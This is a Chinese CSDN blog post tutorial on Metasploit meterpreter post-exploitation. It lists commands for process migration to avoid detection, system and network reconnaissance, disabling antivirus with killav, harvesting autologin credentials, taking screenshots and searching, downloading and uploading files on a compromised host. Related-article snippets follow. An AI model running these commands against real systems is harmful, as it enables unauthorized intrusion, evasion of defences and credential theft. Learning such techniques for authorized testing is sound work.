metasploit后渗透之信息收集

最新推荐文章于 2022-12-26 23:36:55 发布
最新推荐文章于 2022-12-26 23:36:55 发布
阅读量231 收藏
点赞数
分类专栏: 内网
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43152809/article/details/110890876
版权

后渗透工具:meterpreter
该工具具有多重功能,使后续的渗透变得更加容易
获取目标机的meterpreter shell后,就进入了后期渗透利用阶段
后期渗透模块有200多个
meterpreter优势:

  • 纯内存工作模式,不需要对磁盘进行任何写入操作
  • 使用加密通信协议,而且可以同时与几个信道通信
  • 在被攻击进程内工作,不需要创建新的进程
  • 易于在多进程之间迁移
  • 平台通用

进程迁移

刚获得meterpreter shell时,该shell极其脆弱并且易受攻击
第一步就是要移动这个shell,把它和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何的写入操作,这样可以使shell更难被检测到

在这里插入图片描述
使用ls查看目录
在这里插入图片描述
ps获得当前正在运行的进程
在这里插入图片描述
getpid查看meterpreter shell的进程号
在这里插入图片描述
手动进程迁移
在这里插入图片描述
自动进程迁移
进程迁移完成后原pid会自动关闭,如果没有自动关闭可以输入kill 2716杀掉该进程,使用自动迁移命令后,系统会自动寻找合适的进程然后迁移

系统命令

获得了稳定的进程后,接下来收集系统信息
在这里插入图片描述
使用sysinfo查看目标机的系统信息,例如操作系统和体系结构
在这里插入图片描述
使用run post/windows/gather/checkvm查看目标机是否是虚拟机
使用idletime查看目标机最近的运行时间
可以看到,已经运行了3min38sec
在这里插入图片描述
使用route命令查看目标机完整的网络设置
在这里插入图片描述
使用getuid查看当前目标机上已经渗透成功的用户名
在这里插入图片描述
可以使用run post/windows/manage/killav关闭杀毒软件
在这里插入图片描述
使用background命令将当前会话放到后台,适合多个meterpreter会话的情况下使用
在这里插入图片描述
可以在background后使用route add将路由加入路由表中
回到meterpreter状态:
在这里插入图片描述
sessions -I x 查看所有后台shell程序
session (-i) 1
回到id为1
在这里插入图片描述
列举当前登录的用户
在这里插入图片描述
列举应用程序
在这里插入图片描述
抓取自动登陆的用户名和密码
在这里插入图片描述
在这里插入图片描述
截取屏幕,使用screengrab需要首先load espia,随后才可以使用
也可以只是用screenshot
在这里插入图片描述
pwd或getwd查看当前处于目标机的哪个目录
getlwd查看本机当前处于哪个目录
cd切换目录
在这里插入图片描述
search -f *.txt -d c:/
可以查看目标机c盘目录下后缀为txt的所有文件
可以使用download进行下载,upload进行上传
命令示例:

download c:\test.txt /root
upload /root/test.txt c:\
aur03a
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[系统安全] 三十八.Metasploit渗透技术信息收集、权限提权和功能模块详解
杨秀璋的专栏
01-17 5827
系统安全将更好地帮助初学者了解病毒逆向分析和系统安全。前文带领大家了解Metasploit技术,它和CS都是APT攻击中常见的方式,并结合作者之前的漏洞利用及WannaCry逆向经验总结。这篇文章继续带领大家深入Metasploit技术,涉及后渗透相关的技术,包括信息收集、权限提权、移植漏洞模块和后门。同时,结合作者之前的漏洞利用及WannaCry逆向经验总结。希望这篇文章对您有所帮助~
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
**Metasploit渗透测试指南** 渗透测试是一种授权的安全测试,旨在发现并评估计算机网络和系统的弱点,以增强安全防御。Metasploit是一款广泛使用的开源工具,专为安全专业人士设计,用于执行这种测试。本指南将深入...
渗透流量加密
Scorpio_m7
02-14 4628
????写在前面 ????博客主页:Scorpio_m7,github ????欢迎关注????点赞????收藏⭐️留言???? ????本文由 Scorpio_m7原创,CSDN首发! ????首发时间:????2022年2月9日???? ✉️坚持和努力一定能换来诗与远方! ????作者水平很有限,如果发现错误,请留言轰炸哦!万分感谢感谢感谢! 文章目录????写在前面前言未加密OpenSSLnetcat流量加密Metasploit流量加密OpenSSL创建证书impersonate_ssl模块使用
Metasploit渗透框架超详细
HAKUNAMATATATTA的博客
12-26 1991
The Metasploit Framework 的简称。MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。模块是通过Metasploit框架装载集成对外提供的最核心的渗透测试功能实现代码。MSF所有的漏洞测试都是基于模块。
渗透学习之Metasploit的post模块使用信息收集
来到了学渣的博客
02-22 2829
环境 Kali和win7是nat连接 Kali:192.168.10.145 Win7:192.168.10.143 如果Msf拿shell后出现乱码,输入chcp 65001即可 MSF的post模块 进入msf5 > search post,搜索post模块,发现有471个模块可使用,我挑一部分出来翻译大概看看是用来干嘛的 Linux: Window: 首先得拿一个cmd的s...
metasploit渗透之域信息收集
Longwaer
01-30 943
通过学习了解metasploit各种渗透小技巧,从而更好的掌握后渗透技术。
Metasploit渗透测试指南 修订版
09-21
Metasploit渗透测试指南 修订版》是一本深度探讨Metasploit框架的权威书籍,旨在帮助初学者和专业人士理解并掌握网络安全领域的渗透测试技术。Metasploit是一款强大的开源安全工具,广泛应用于安全评估、漏洞验证...
Metasploit渗透测试指南.修订版
09-12
5. **Post-exploitation(后渗透)**:在成功入侵后,如何进一步扩展权限、收集信息和保持持久存在。这部分内容涵盖了权限提升、信息搜集和反检测策略。 6. **社会工程学工具**:Metasploit不仅仅用于技术层面的...
关于Metasploit Framework与渗透测试相关知识
最新发布
12-28
2. **工作流程**:通常,渗透测试者首先使用Metasploit进行信息收集,然后选择合适的exploit针对目标系统,接着配置payload并启动攻击,最后利用meterpreter会话进行后渗透操作。 3. **数据库管理**:Metasploit与...
metasploit常用渗透命令.zip
09-16
7. **信息收集**:Metasploit提供了多种信息收集工具,如扫描网络、枚举服务、获取主机信息等。`use auxiliary/scanner/portscan/tcp`进行TCP端口扫描,`set RHOSTS <target_ip>`设置目标IP。 8. **Payload生成**:...
Meterpreter后渗透模块之信息收集
sGanYu
09-23 2134
进程迁移 防止进程被用户关闭,移动shell 1)手动 先使用ps查看目标正在运行的进程 查看当前进程号 meterpreter > getpid Current pid: 1104 从ps查看的运行进程内找出meterpreter的ipd,可以看到,现在的进程为1104,name为svchost.exe,输入migrate 2844迁移至explorer.exe,因为该进程是一个稳定的应用,然后再使用getpid查看新的进程号 meterpreter > mig
Metasploit学习笔记(四)——Meterpreter后渗透信息搜集
Zichel77的博客
10-07 1207
此时就需要用到扩展插件Espia,使用前要先输入load espia命令加载该插件,然后输入screengrab命令,就可以抓取此时目标机的屏幕截图。在刚获得Meterpreter Shell时,该Shell是极其脆弱和易受攻击的,例如攻击者可以利用浏览器漏洞攻陷目标机器,但攻击渗透后浏览器有。所以第一步就是要移动这个Shell,把它和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作。利用前面永恒之蓝的步骤一模一样,就可以进到后渗透的步骤meterpreter,前面的详细步骤参考。
渗透信息收集
good good study
04-11 4658
目录 1. 获取目标机器的分区情况 2. 判断是否为虚拟机 3.查看目标机开启哪些服务 4. 查看目标安装了哪些应用及其版本以及补丁 5. 查看共享文件 6. 获取目标主机最近的系统操作 接上一篇文章我们获取了一个shell并提升为system权限后 -》Windows后渗透之权限提升,接下来进行信息收集,或者先信息收集在提权都行。meterpreter该工具具有多重功能,使后续的渗透变得更加容易。获取目标机的meterpreter shell后,就进入了后期渗透利用阶段,后期渗透模块有2..
渗透测试工具篇之Metasploit(MSF)框架介绍与基本命令
lzp_5257的博客
04-22 5380
提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试 前言 我们能够通过它发现漏洞并进行快速实施攻击 Metasploit(MSF)是一个免费的、可下载的框架,通过它可以很容易的获取、开发并且对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 一、MSF常用模块 Auxiliary 辅助模块:为渗透测试信息搜索提供了大量的辅助模块支持。 Exploits 攻击模块:利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,从而获得对远程目标系统访问权的代码组件。 Paylo.
Metasploit信息收集
weixin_41489908的博客
08-11 568
毕业了,想留的人没能留住,想要的生活也没有如约而至,也就这样了。。。 ---- 网易云热评 一、MSF更新 1、apt-get update 2、apt-get install metasploit-framework 二、敏感目录收集 1、查找dir_scanner模块 search dir_scanner type:auxiliary 2、选择扫描用到的辅助模块 use 0或者use auxiliary/scanner/http/dir_scanner 3、查看需要设置的参.
【工具使用】——Metasploit(MSF)使用详解(超详细)
热门推荐
weixin_45588247的博客
08-12 9万+
文章目录01Metasploit使用一、简介:二、Metasploit的安装和更新升级:1. 一键安装MSF:2. MSF的更新升级:三、使用方法:1. 基础使用:2. `MSF`中加载自定义的`exploit模块`:3. 漏洞利用(exploit):4. 攻击载荷(payload):4.1 payload模块路径::4.2 Metasploit中的 Payload 模块主要有以下三种类型:5. Meterpreter:5.1 Meterpreter是如何工作的?:5.2 Meterpreter的特点:6.
渗透测试信息收集
weixin_44912035的博客
12-20 2459
渗透信息收集 信息收集主要是收集服务器的配置信息和网站的敏感信息,主要包括域名信息、子域名信息、目标网站信息、目标网站真实IP、目录文件、开放端口和服务、中间件信息、脚本语言等等等 当你拿到一个目标站,就是要去做的是如下:whois查询,子域名爆破,C段/旁站、Web指纹收集、端口扫描等等。 whois 可获取如下信息 子域名扫描 OneForAll,Layer子域名扫描, Sublist3r(列举多资源下查到的域名)和subDomainsBrute。(递归查询多级域名) 以及一些在线的网站比如: ht
渗透之——Metasploit-Meterpreter Shell信息收集相关的命令
冰河的专栏
01-06 1803
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85944005 PS:以下所有的命令都是在Metasploit-Meterpreter Shell下执行的。 一、进程迁移 1、获取目标机正在运行的进程 ps 2.查看Meterpreter Shell的进程号 getpid 3.将Meterpreter Shell进程绑...
Metasploit--后渗透--获取目标主机的详细信息
千寻的博客
02-18 650
获取目标主机的详细信息 run scraper 它将目标机器上的常见信息收集起来然后下载保存在本地
信息安全技术:Metasploit介绍.pptx
11-01
而国际上惯用的渗透测试标准(PTES)规定了渗透测试的步骤,包括前期交互阶段、情报收集、漏洞分析、渗透测试、后渗透攻击和报告等阶段。目前已有多个成熟的框架用来实施这些阶段,帮助渗透测试人员更加高效地完成...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值